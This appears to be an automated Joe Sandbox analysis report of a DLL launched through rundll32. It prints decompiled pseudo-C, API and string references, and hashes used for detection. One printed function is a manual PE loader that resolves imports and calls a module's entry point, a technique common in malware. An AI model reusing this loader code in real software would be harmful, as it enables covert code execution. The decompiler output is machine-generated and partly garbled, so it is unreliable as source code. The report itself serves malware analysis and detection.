										if(__eflags != 0) {
											_t122 = E1000B88D( &_v20, __eflags);
											__eflags = _t122 - 0xc8;
											if(_t122 == 0xc8) {
												 *_a20 = _t190;
												 *_a12 = _t187;
												 *_a16 = _t157;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t122;
											L35:
											_t128 =  *0x10020d70; // 0x0
											 *((intOrPtr*)(_t128 + 8))(_t190);
											_t191 = _v12;
											L36:
											__eflags = _t157;
											if(_t157 != 0) {
												_t132 =  *0x10020d70; // 0x0
												 *((intOrPtr*)(_t132 + 8))(_t157);
											}
											__eflags = _t187;
											if(_t187 != 0) {
												_t172 =  *0x10020d70; // 0x0
												 *((intOrPtr*)(_t172 + 8))(_t187);
											}
											return _t191;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L35;
									} else {
										GetLastError();
										_t136 =  *0x10020d70; // 0x0
										 *((intOrPtr*)(_t136 + 8))(_t190);
										_t190 = 0;
										__eflags = 0;
										goto L26;
									}
								} else {
									GetLastError();
									L26:
									_t138 =  *0x10020d70; // 0x0
									 *((intOrPtr*)(_t138 + 8))(_t157);
									_t157 = 0;
									__eflags = 0;
									goto L27;
								}
							} else {
								GetLastError();
								L27:
								_t140 =  *0x10020d70; // 0x0
								 *((intOrPtr*)(_t140 + 8))(_t187);
								_t187 = 0;
								__eflags = 0;
								goto L28;
							}
						}
						GetLastError();
						L28:
						_t173 = _t190;
						_t182 = _v12 + 1;
						_v12 = _t182;
						__eflags = _t182 - 2;
					} while (_t182 < 2);
					__eflags = _t173;
					if(_t173 != 0) {
						goto L31;
					}
					_t191 = 0xfffffffe;
					goto L36;
				}
				_t155 = 0xfffffffc;
				return _t155;
			}

0x1000f927
0x1000f92f
0x1000f936
0x1000f943
0x1000f94b
0x1000f94d
0x1000f95e
0x1000f975
0x1000f978
0x1000f97f
0x1000f980
0x1000f98b
0x1000f998
0x1000f99b
0x1000f9a0
0x1000f9a5
0x1000f9a7
0x1000f9af
0x1000f9ba
0x1000f9c1
0x1000f9cd
0x1000f9d0
0x1000f9de
0x1000f9e1
0x1000f9e7
0x1000f9e8
0x1000f9ea
0x1000f9f3
0x1000f9f4
0x1000f9f9
0x1000f9ff
0x1000fa09
0x1000fa09
0x1000fa0b
0x1000fa10
0x1000fa10
0x1000fa1f
0x1000fa2e
0x1000fa30
0x1000fa32
0x1000fa41
0x1000fa58
0x1000fa5e
0x1000fa61
0x1000fa65
0x1000fa67
0x1000fa6c
0x1000fa6c
0x1000fa71
0x1000fa73
0x1000fa80
0x1000fa84
0x1000fa89
0x1000fa8b
0x1000fa8b
0x1000fa8e
0x1000fa92
0x1000fa97
0x1000fa99
0x1000fa99
0x1000fab0
0x1000fab6
0x1000fab9
0x1000fabd
0x1000fabf
0x1000fac2
0x1000fac7
0x1000fac7
0x1000facc
0x1000face
0x1000fadb
0x1000fadf
0x1000fae3
0x1000fae3
0x1000fae8
0x1000faec
0x1000fb25
0x1000fb2b
0x1000fb34
0x1000faee
0x1000faf3
0x1000fafb
0x1000fb00
0x1000fb0b
0x1000fb11
0x1000fb1b
0x1000fb1e
0x1000fb1e
0x1000fb37
0x1000fb3b
0x1000fb40
0x1000fb40
0x1000fb45
0x1000fb49
0x1000fb8f
0x1000fb91
0x1000fb94
0x1000fb9c
0x1000fba0
0x1000fba3
0x1000fbb5
0x1000fbc0
0x1000fbc2
0x1000fbd6
0x1000fbdb
0x1000fbe0
0x1000fc15
0x1000fc1a
0x1000fc1f
0x1000fc21
0x00000000
0x1000fc21
0x1000fbe4
0x1000fbe7
0x1000fbe7
0x1000fbed
0x1000fbf0
0x1000fbf3
0x1000fbf3
0x1000fbf5
0x1000fbf7
0x1000fbfd
0x1000fbfd
0x1000fc00
0x1000fc02
0x1000fc04
0x1000fc0b
0x1000fc0b
0x00000000
0x1000fc0e
0x1000fbc4
0x1000fbca
0x00000000
0x1000fb4b
0x1000fb4b
0x1000fb51
0x1000fb57
0x1000fb5a
0x1000fb5a
0x00000000
0x1000fb5a
0x1000fad0
0x1000fad0
0x1000fb5c
0x1000fb5c
0x1000fb62
0x1000fb65
0x1000fb65
0x00000000
0x1000fb65
0x1000fa75
0x1000fa75
0x1000fb67
0x1000fb67
0x1000fb6d
0x1000fb70
0x1000fb70
0x00000000
0x1000fb70
0x1000fa73
0x1000fa34
0x1000fb72
0x1000fb75
0x1000fb77
0x1000fb7a
0x1000fb7d
0x1000fb7d
0x1000fb86
0x1000fb88
0x00000000
0x00000000
0x1000fb8c
0x00000000
0x1000fb8c
0x1000fa03
0x00000000

APIs

memset.MSVCRT ref: 1000F94D
memset.MSVCRT ref: 1000F95E

Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000FA34

Strings

POST, xrefs: 1000FA92
GET, xrefs: 1000FA99, 1000FAAF

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: memset$ErrorLast
String ID: GET$POST
API String ID: 2570506013-3192705859
Opcode ID: 5137b3a0b5685b47c74c298811dfd1042f56357df4ff912952738d4948db115f
Instruction ID: 60176bb3b918099171355f2e0455e639eaf927cb7297a2eeaffab32ddf1112b2
Opcode Fuzzy Hash: 5137b3a0b5685b47c74c298811dfd1042f56357df4ff912952738d4948db115f
Instruction Fuzzy Hash: 55A14DB1900618AFEB10DFA4CC84ABEBBF9FF49350F104069F905E72A1DB34AA41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 100126D6 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 10012756
qsort.MSVCRT ref: 100129D4

Strings

null, xrefs: 1001271B
false, xrefs: 10012739
%I64d, xrefs: 10012748
true, xrefs: 1001272D

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 58f23407bd26eee7a2894696c6464957577155679522b91e5bdae1fe44fed9b8
Instruction ID: 6ab0388892a03626c6ba9818edcedb4f868e89afd272a7049aaf2efd7bcae5db
Opcode Fuzzy Hash: 58f23407bd26eee7a2894696c6464957577155679522b91e5bdae1fe44fed9b8
Instruction Fuzzy Hash: 53E149B550420ABFEF11DE64CC82EAF3BA9EF45394F108419FE149E181E631D9F19BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6936E072 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Scre_fullinfo.GB ref: 6936E095

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: Scre_fullinfo
String ID:
API String ID: 3112101106-0
Opcode ID: 6dcebc9b637d95a7c3c00b674dbc11df12d7e4a94ef838fc4549ba4ba70972a7
Instruction ID: d01181398fbdb300edae4c99a541ba18f80170732bc52e9bc19656bce0c56a82
Opcode Fuzzy Hash: 6dcebc9b637d95a7c3c00b674dbc11df12d7e4a94ef838fc4549ba4ba70972a7
Instruction Fuzzy Hash: C6519F74A04209DFCB10DFA8C985AAEBBF1BF48344F108529E854EB354E335A955CF91

Uniqueness

Uniqueness Score: -1.00%

Function 69341020 Relevance: 9.1, APIs: 6, Instructions: 112sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,693412E0,?,?,?,?,?,?,693413A3), ref: 69341057
_amsg_exit.MSVCRT ref: 69341085

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: f9b4f6d0b30007e82f9b2dcb04df29e04556d41dbf668b3bd9aab9173f648a1d
Instruction ID: fe10e7d6ec79cb2727974a487930bd28d32519eb45b7cfcc6c01c376984925dc
Opcode Fuzzy Hash: f9b4f6d0b30007e82f9b2dcb04df29e04556d41dbf668b3bd9aab9173f648a1d
Instruction Fuzzy Hash: 3141A7B16187408FEB00EF9DD68171B77E8FBA2B44F52462DD4648B244D77AC4A1CB93

Uniqueness

Uniqueness Score: -1.00%

Function 1000B07D Relevance: 9.1, APIs: 6, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000B07D(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push("\\");
						_t36 = E10009DC8( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E1000953B( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}

0x1000b086
0x1000b08d
0x1000b090
0x1000b09d
0x1000b0a3
0x1000b0a6
0x1000b0a8
0x1000b0ad
0x1000b185
0x1000b185
0x1000b185
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b0b3
0x1000b0b3
0x1000b0b3
0x1000b0b6
0x1000b0bc
0x1000b0d8
0x1000b0df
0x1000b0e5
0x1000b0e9
0x1000b0fd
0x1000b0fd
0x1000b100
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b0eb
0x1000b0eb
0x1000b0f0
0x1000b0f4
0x1000b0f4
0x1000b0f8
0x1000b0f9
0x00000000
0x1000b0eb
0x1000b101
0x1000b101
0x1000b104
0x1000b105
0x1000b10c
0x1000b116
0x00000000
0x00000000
0x1000b118
0x1000b11e
0x1000b122
0x1000b17b
0x1000b12b
0x1000b138
0x1000b13e
0x1000b140
0x1000b147
0x1000b14d
0x1000b155
0x1000b15d
0x1000b169
0x1000b16f
0x00000000
0x1000b181
0x1000b10e
0x00000000

APIs

GetCommandLineW.KERNEL32 ref: 1000B092
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 1000B09D
lstrlenW.KERNEL32 ref: 1000B0DF
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 1000B138
lstrcpynW.KERNEL32(?,00000000,00000104), ref: 1000B15D
lstrcpynW.KERNEL32(?,?,00000104), ref: 1000B17B

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
String ID:
API String ID: 1259063344-0
Opcode ID: 674de03f7284a0a6e09ea563e48131a4c2cb913a3190575a73f7948faaa34436
Instruction ID: 6040b5f80791b44e58dcf4f25a74dd89cab7fcefb426b9fe502b13d349ab77a1
Opcode Fuzzy Hash: 674de03f7284a0a6e09ea563e48131a4c2cb913a3190575a73f7948faaa34436
Instruction Fuzzy Hash: 4D31E171D00516BBFB20EF94CC94AEEB7F8EF05390F518559E412E3054EB709AC18B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000DBC8 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000DBDC
SysAllocString.OLEAUT32(?), ref: 1000DBE4
SysAllocString.OLEAUT32(00000000), ref: 1000DBF8
SysFreeString.OLEAUT32(?), ref: 1000DC73
SysFreeString.OLEAUT32(?), ref: 1000DC76
SysFreeString.OLEAUT32(?), ref: 1000DC7B

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 9e9d9e0d3d7b8979127c60d1f401c69ad389860a69b845eb569b7036a2d8c55e
Instruction ID: 5154142f606cb33e32ed2096994121df708758d659f1894e466c11fc5810634a
Opcode Fuzzy Hash: 9e9d9e0d3d7b8979127c60d1f401c69ad389860a69b845eb569b7036a2d8c55e
Instruction Fuzzy Hash: 8A211D75E00219BFEB00DFA5CC88D9FBBBCEF49694B10449AF505E7250DA71AE41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 69370BD8 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 222COMMON

Download Yara Rule

APIs

Scre_fullinfo.GB ref: 69370CE3
memset.MSVCRT ref: 69370D31

Strings

, xrefs: 69370EC1
ERCP, xrefs: 69370C10

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: Scre_fullinfomemset
String ID: $ERCP
API String ID: 1073896759-4058133170
Opcode ID: b582e281489c2d5cf5d12ce119fd34363468adf4fafc54460c0903d6a961ab46
Instruction ID: 460c783e213dd51e12951c5fd4a79c46cdab34686178c6fd61c75c312007e044
Opcode Fuzzy Hash: b582e281489c2d5cf5d12ce119fd34363468adf4fafc54460c0903d6a961ab46
Instruction Fuzzy Hash: 0EB16BB4A043098FDB50CF99C685B9EBBF0FB48314F118559E858AB351D339E941CF65

Uniqueness

Uniqueness Score: -1.00%

Function 10014DFC Relevance: 7.8, APIs: 5, Instructions: 322
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E10014DFC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}

0x10014e05
0x10014e12
0x10014e18
0x10014e21
0x10014e24
0x10014e27
0x00000000
0x10014f18
0x10014f1c
0x10014f1e
0x10014f2c
0x1001504a
0x1001504e
0x10015113
0x1001511c
0x1001511f
0x10015123
0x10015129
0x10015131
0x10015131
0x10015139
0x10015147
0x1001514a
0x1001514e
0x10015154
0x10015164
0x1001518f
0x00000000
0x10015191
0x1001516a
0x1001517b
0x00000000
0x10015189
0x1001518d
0x00000000
0x10015189
0x1001517d
0x10015181
0x10015186
0x00000000
0x10015186
0x1001516c
0x10015170
0x10015172
0x00000000
0x10015172
0x10015156
0x1001515a
0x00000000
0x1001515c
0x10015054
0x10015058
0x1001505a
0x10015068
0x00000000
0x00000000
0x1001506e
0x10015077
0x10015085
0x10015091
0x1001509d
0x100150a6
0x100150a9
0x100150ad
0x100150af
0x100150bc
0x100150d0
0x100150df
0x100150f0
0x100150b9
0x00000000
0x100150b9
0x100150f2
0x100150f6
0x100150fb
0x00000000
0x100150fb
0x10015106
0x00000000
0x00000000
0x10015108
0x1001510c
0x00000000
0x1001510e
0x10014f32
0x10014f3b
0x10014f49
0x10014f4c
0x10014f69
0x10014f70
0x10014f82
0x10014f82
0x10014f89
0x10014f99
0x10014fb1
0x10014f9b
0x10014fa3
0x10014fa3
0x10014fb4
0x10014fb8
0x10014fc8
0x10014feb
0x10014ffd
0x10014fca
0x10014fde
0x10014fde
0x10015007
0x10015023
0x10015009
0x10015018
0x10015018
0x1001502b
0x10015034
0x10015034
0x10015042
0x00000000
0x10014f8b
0x10014f8d
0x00000000
0x10014f8d
0x10014f89
0x00000000
0x10014f4c
0x10014e2f
0x10014e3d
0x10014e42
0x10014e4d
0x10014e50
0x10014e54
0x10014e56
0x10014e66
0x10014e6f
0x10014e78
0x10014e80
0x10014e89
0x10014e94
0x10014e9a
0x10014e9d
0x10014ea0
0x10014ea7
0x10014eae
0x00000000
0x00000000
0x10014eb9
0x10014ec7
0x10014ed2
0x10014edc
0x10014ef4
0x10014f01
0x10014f01
0x10014ede
0x10014ee9
0x10014ee9
0x10014f08
0x10014f08
0x10014f10
0x10014f10
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 10014F63
LoadLibraryA.KERNEL32(00000000), ref: 10014F7C
GetProcAddress.KERNEL32(00000000,?), ref: 10014FD8
GetProcAddress.KERNEL32(00000000,?), ref: 10014FF7
lstrcmpA.KERNEL32(?,00000000), ref: 100150E8

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModulelstrcmp
String ID:
API String ID: 1872726118-0
Opcode ID: 419c020a87105bdceccdc306fbfdf2abceeec5315adc811461ed6dcf7bea98ed
Instruction ID: f6e2eba122cbf77a2ae5ba8af3865ace0f975eec235aae4e96ffcfdcfd34bc1d
Opcode Fuzzy Hash: 419c020a87105bdceccdc306fbfdf2abceeec5315adc811461ed6dcf7bea98ed
Instruction Fuzzy Hash: 65E18D74A10209EFDB51CFA8C880BADBBF1FB08355F258569E815AF3A1D735E981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10012C1B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 10012C89
\u%04X\u%04X, xrefs: 10012D74
\u%04X, xrefs: 10012D35

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: d386108904b2367e7a539220f608067250315fab26c66a0f40ad273b13d001fd
Instruction ID: 2f7f0510fea53a2a38c644e53789d9b16a97eaeec47c91ed49662b1c0a338719
Opcode Fuzzy Hash: d386108904b2367e7a539220f608067250315fab26c66a0f40ad273b13d001fd
